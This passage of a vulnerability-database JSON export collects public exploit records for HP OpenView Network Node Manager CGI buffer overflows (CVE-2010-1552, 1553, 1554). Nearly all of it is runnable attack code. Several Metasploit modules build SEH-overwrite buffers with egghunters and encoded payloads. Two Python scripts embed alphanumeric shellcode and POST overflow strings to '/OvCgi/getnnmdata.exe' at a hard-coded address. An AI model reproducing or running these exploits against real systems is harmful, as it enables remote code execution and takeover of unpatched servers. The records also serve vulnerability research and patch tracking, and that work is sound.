'BufferRegister' => 'ecx' },\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.53 w/NNM_01201',\n {\n 'Ret' => 0x5a238ba7, # pop edx/pop ebp/ret - in ovsnmp.dll v1.30.10.9166\n }\n ],\n [ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',\n {\n 'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\n }\n ],\n [ 'Debug Target',\n {\n 'Ret' => 0xdeadbeef, # crasher\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'May 11 2010'))\n end\n\n def exploit\n\n print_status(\"Trying target #{target.name}...\")\n\n cgi = '/OvCgi/snmpviewer.exe'\n\n # \"ins\" must be \"load\" or \"content\"\n ins_ok = [ 'load', 'content' ]\n ins = ins_ok[rand(ins_ok.length)]\n\n start = 'The specified Application/Action name is not defined.<p>Application:\"'\n #middle = '\"<p>Action:\"'\n\n ia32 = Metasm::Ia32.new\n\n # SEH\n seh_offset = 1192\n seh_frame = rand_text(8)\n\n # Jump back to the payload, after p/p/r jumps to us.\n distance = seh_offset - start.length + seh_frame.length # dry run\n jmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string\n distance = seh_offset - start.length - jmp_back.length\n distance += 8 if ins == 'content'\n jmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string\n\n # A short jump back to the long jump back :)\n jmp_small = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + jmp_back.length.to_s).encode_string\n\n # Fix up the SEH frame\n seh_frame[0,jmp_small.length] = jmp_small\n seh_frame[4,4] = [target.ret].pack('V')\n\n # Create the buffer\n buf = ''\n buf << payload.encoded\n pad = seh_offset - start.length - buf.length - jmp_back.length\n pad += 8 if ins == 'content'\n buf << rand_text(pad)\n buf << jmp_back\n buf << seh_frame\n\n app = buf\n\n # Force an exception writing off the end of the stack\n action = rand_text(1024)\n\n # Send the request\n if rand(2) > 0\n print_status(\"Sending exploit via POST request (ins=#{ins})...\")\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"POST\",\n 'vars_post' =>\n {\n 'ins' => ins,\n 'act' => action,\n 'app' => app\n }\n }, 3)\n else\n print_status(\"Sending exploit via GET request (ins=#{ins})...\")\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"GET\",\n 'vars_get' =>\n {\n 'ins' => ins,\n 'act' => action,\n 'app' => app\n }\n }, 3)\n end\n\n if res and res.code != 502\n print_error(\"Eek! We weren't expecting a response, but we got one\")\n print_status(res.to_s) if datastore['NNM_DEBUG']\n end\n\n handler\n\n end\n\n def wfs_delay\n 5\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:12", "description": "", "published": "2010-07-03T00:00:00", "type": "packetstorm", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2010-07-03T00:00:00", "id": "PACKETSTORM:91443", "href": "https://packetstormsecurity.com/files/91443/HP-OpenView-NNM-getnnmdata.exe-CGI-Invalid-ICount-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution \n# Date: 2010.07.02 \n# Author: S2 Crew [Hungary] \n# Software Link: hp.com \n# Version: 7.53 \n# Tested on: Windows 2003 \n# CVE: CVE-2010-1554 \n \n# Code : \n \n#!/usr/bin/python \n \nimport struct \nimport socket \nimport httplib \nimport urllib \n \n# calc.exe Windows Execute Command \nsc2 = ( \n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\" \n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\" \n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\" \n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\" \n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\" \n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\" \n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\" \n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\" \n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\" \n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\" \n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\" \n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\" \n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\" \n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\" \n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\" \n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\" \n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\" \n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\" \n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\" \n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\" \n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\" \n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\" \n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\" \n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\" \n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\" \n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\" \n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\" \n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\" \n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\" \n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\" \n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\" \n) \n \negghunter = ( \n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\" \n\"\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\" \n\"\\xef\\xb8\\x54\\x30\\x30\\x57\\x8b\\xfa\" \n\"\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n) \n \nret = struct.pack('<L',0x5A667A77) # ppr \njmp1 = '\\xeb\\xf9\\x90\\x90' \njmp2 = '\\xeb\\xdd\\x90\\x90\\x90' \n \np = 'Topo=X&SnmpVals=X&Hostname=X&ICount='+'9'*100+'A'*1917+egghunter+jmp2+jmp1 + ret + \"C\"*500 \n \nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2} \n \nc = httplib.HTTPConnection('172.16.29.149') \nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h) \nr = c.getresponse() \n \nprint r.status, r.reason \ndata = r.read() \nprint data \nc.close() \n \nprint \"\\nDone\\n\" \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91443/icount-exec.txt"}, {"lastseen": "2016-12-05T22:18:33", "description": "", "published": "2011-03-24T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2011-03-24T00:00:00", "id": "PACKETSTORM:99674", "href": "https://packetstormsecurity.com/files/99674/HP-OpenView-Network-Node-Manager-getnnmdata.exe-ICount-CGI-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_nnm_getnnmdata_icount.rb 12117 2011-03-23 21:57:16Z mc $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. \nBy sending specially crafted ICount parameter to the getnnmdata.exe CGI, \nan attacker may be able to execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12117 $', \n'References' => \n[ \n[ 'CVE', '2010-1554' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 750, \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\", \n'DisableNops' => 'True', \n'EncoderType' => Msf::Encoder::Type::AlphanumUpper, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'ECX', \n}, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7582, 'Ret' => 0x5a01f277 } ], \n[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2052, 'Ret' => 0x5a666d69 } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 11 2010')) \n \nregister_options( [ Opt::RPORT(80) ], self.class ) \nend \n \ndef exploit \n \negg = rand_text_alpha_upper(4) \n \nhunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\" \nhunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n \nboom = rand_text_alpha_upper(target['Offset']) \nboom << generate_seh_record(target.ret) \nboom << hunter + egg + egg \nboom << payload.encoded \nboom << rand_text_alpha_upper(9024 - payload.encoded.length) \n \nsploit = \"SnmpVals=&ICount=-9#{boom}\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_request_cgi({ \n'uri' => '/OvCgi/getnnmdata.exe', \n'method' => 'POST', \n'data' => sploit \n}, 8) \n \nhandler \n \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99674/hp_nnm_getnnmdata_icount.rb.txt"}, {"lastseen": "2016-12-05T22:24:18", "description": "", "published": "2010-07-03T00:00:00", "type": "packetstorm", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2010-07-03T00:00:00", "id": "PACKETSTORM:91442", "href": "https://packetstormsecurity.com/files/91442/HP-OpenView-NNM-getnnmdata.exe-CGI-Invalid-MaxAge-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution \n# Date: 2010.07.02 \n# Author: S2 Crew [Hungary] \n# Software Link: hp.com \n# Version: 7.53 \n# Tested on: Windows 2003 \n# CVE: CVE-2010-1553 \n \n# Code : \n \n#!/usr/bin/python \n \nimport struct \nimport socket \nimport httplib \nimport urllib \n \n# calc.exe Windows Execute Command \nsc2 = ( \n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\" \n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\" \n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\" \n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\" \n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\" \n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\" \n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\" \n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\" \n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\" \n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\" \n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\" \n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\" \n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\" \n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\" \n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\" \n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\" \n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\" \n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\" \n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\" \n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\" \n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\" \n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\" \n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\" \n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\" \n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\" \n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\" \n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\" \n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\" \n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\" \n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\" \n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\" \n) \n \negghunter = ( \n\"\\x89\\xe1\\xda\\xd7\\xd9\\x71\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\" \n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\" \n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\" \n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\" \n\"\\x50\\x66\\x4f\\x71\\x4b\\x7a\\x49\\x6f\\x46\\x6f\\x50\\x42\\x51\\x42\\x43\" \n\"\\x5a\\x45\\x52\\x43\\x68\\x48\\x4d\\x46\\x4e\\x45\\x6c\\x47\\x75\\x42\\x7a\" \n\"\\x44\\x34\\x48\\x6f\\x4e\\x58\\x42\\x74\\x50\\x30\\x46\\x50\\x42\\x77\\x4c\" \n\"\\x4b\\x4a\\x5a\\x4e\\x4f\\x43\\x45\\x4a\\x4a\\x4c\\x6f\\x43\\x45\\x4a\\x47\" \n\"\\x49\\x6f\\x4b\\x57\\x41\\x41\" \n) \n \nret = struct.pack('<L',0x5A667A77) # ppr \njmp = \"\\x74\\x21\\x44\\x44\" \n \np = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter \n \nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2} \n \nc = httplib.HTTPConnection('172.16.29.149') \nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h) \nr = c.getresponse() \n \nprint r.status, r.reason \ndata = r.read() \nprint data \nc.close() \n \nprint \"\\nDone\\n\" \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91442/getnnmdata-exec.txt"}, {"lastseen": "2016-12-05T22:24:03", "description": "", "published": "2011-03-24T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2011-03-24T00:00:00", "id": "PACKETSTORM:99672", "href": "https://packetstormsecurity.com/files/99672/HP-OpenView-Network-Node-Manager-getnnmdata.exe-MaxAge-CGI-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_nnm_getnnmdata_maxage.rb 12117 2011-03-23 21:57:16Z mc $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. \nBy sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, \nan attacker may be able to execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12117 $', \n'References' => \n[ \n[ 'CVE', '2010-1553' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 750, \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\", \n'DisableNops' => 'True', \n'EncoderType' => Msf::Encoder::Type::AlphanumUpper, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'ECX', \n}, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7591, 'Ret' => 0x5a01f277 } ], \n[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2054, 'Ret' => 0x5a666d69 } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 11 2010')) \n \nregister_options( [ Opt::RPORT(80) ], self.class ) \nend \n \ndef exploit \n \negg = rand_text_alpha_upper(4) \n \nhunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\" \nhunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n \nboom = rand_text_alpha_upper(target['Offset']) \nboom << generate_seh_record(target.ret) \nboom << hunter + egg + egg \nboom << payload.encoded \nboom << rand_text_alpha_upper(9024 - payload.encoded.length) \n \nsploit = \"SnmpVals=&MaxAge=#{boom}\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_request_cgi({ \n'uri' => '/OvCgi/getnnmdata.exe', \n'method' => 'POST', \n'data' => sploit \n}, 8) \n \nhandler \n \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99672/hp_nnm_getnnmdata_maxage.rb.txt"}, {"lastseen": "2016-12-05T22:16:34", "description": "", "published": "2011-03-24T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "modified": "2011-03-24T00:00:00", "id": "PACKETSTORM:99673", "href": "https://packetstormsecurity.com/files/99673/HP-OpenView-Network-Node-Manager-snmpviewer.exe-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_nnm_snmpviewer_actapp.rb 12098 2011-03-23 15:47:20Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 \nprior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\" \nCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary \ncode. \n \nThe vulnerable code lies within the a function within \"snmpviewer.exe\" with a \ntimestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET \nor POST request. The request must contain 'act' and 'app' parameters which, when \ncombined, total more than the 1024 byte stack buffer can hold. \n \nIt is important to note that this vulnerability must be exploited by overwriting SEH. \nWhile the saved return address can be smashed, a function call that occurs before \nthe function returns calls \"exit\". \n} , \n'Author' => \n[ \n'jduck' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12098 $', \n'References' => \n[ \n[ 'CVE', '2010-1552' ], \n[ 'OSVDB', '64975' ], \n[ 'BID', '40068' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-083/' ], \n[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, # 1024 byte buffer.. \n'BadChars' => \n# Not sure why this one has a different set of bad chars... \n( \n(0x00..0x08).to_a + (0x0b..0x1f).to_a + \n[ 0x21, 0x26, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f ] \n).pack('C*'), \n'DisableNops' => true, \n# Manually use FPU to get EIP into ECX \n'PrependEncoder' => \"\\x89\\xe2\\xdb\\xdb\\xd9\\x72\\xf4\\x59\\x83\\xe9\\xf7\", \n'EncoderOptions' => { 'BufferRegister' => 'ecx' }, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.53 w/NNM_01201', \n{ \n'Ret' => 0x5a238ba7, # pop edx/pop ebp/ret - in ovsnmp.dll v1.30.10.9166 \n} \n], \n[ 'HP OpenView Network Node Manager 7.53 (Windows 2003)', \n{ \n'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959 \n} \n], \n[ 'Debug Target', \n{ \n'Ret' => 0xdeadbeef, # crasher \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 11 2010')) \n \nregister_options( \n[ \nOpt::RPORT(80), \n], self.class) \nend \n \ndef exploit \n \nprint_status(\"Trying target #{target.name}...\") \n \ncgi = '/OvCgi/snmpviewer.exe' \n \n# \"ins\" must be \"load\" or \"content\" \nins_ok = [ 'load', 'content' ] \nins = ins_ok[rand(ins_ok.length)] \n \nstart = 'The specified Application/Action name is not defined.<p>Application:\"' \n#middle = '\"<p>Action:\"' \n \nia32 = Metasm::Ia32.new \n \n# SEH \nseh_offset = 1192 \nseh_frame = rand_text(8) \n \n# Jump back to the payload, after p/p/r jumps to us. \ndistance = seh_offset - start.length + seh_frame.length # dry run \njmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string \ndistance = seh_offset - start.length - jmp_back.length \ndistance += 8 if ins == 'content' \njmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string \n \n# A short jump back to the long jump back :) \njmp_small = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + jmp_back.length.to_s).encode_string \n \n# Fix up the SEH frame \nseh_frame[0,jmp_small.length] = jmp_small \nseh_frame[4,4] = [target.ret].pack('V') \n \n# Create the buffer \nbuf = '' \nbuf << payload.encoded \npad = seh_offset - start.length - buf.length - jmp_back.length \npad += 8 if ins == 'content' \nbuf << rand_text(pad) \nbuf << jmp_back \nbuf << seh_frame \n \napp = buf \n \n# Force an exception writing off the end of the stack \naction = rand_text(1024) \n \n# Send the request \nif rand(2) > 0 \nprint_status(\"Sending exploit via POST request (ins=#{ins})...\") \nres = send_request_cgi({ \n'uri' => cgi, \n'method' => \"POST\", \n'vars_post' => \n{ \n'ins' => ins, \n'act' => action, \n'app' => app \n} \n}, 3) \nelse \nprint_status(\"Sending exploit via GET request (ins=#{ins})...\") \nres = send_request_cgi({ \n'uri' => cgi, \n'method' => \"GET\", \n'vars_get' => \n{ \n'ins' => ins, \n'act' => action, \n'app' => app \n} \n}, 3) \nend \n \nif res and res.code != 502 \nprint_error(\"Eek! We weren't expecting a response, but we got one\") \nprint_status(res.inspect) if datastore['NNM_DEBUG'] \nend \n 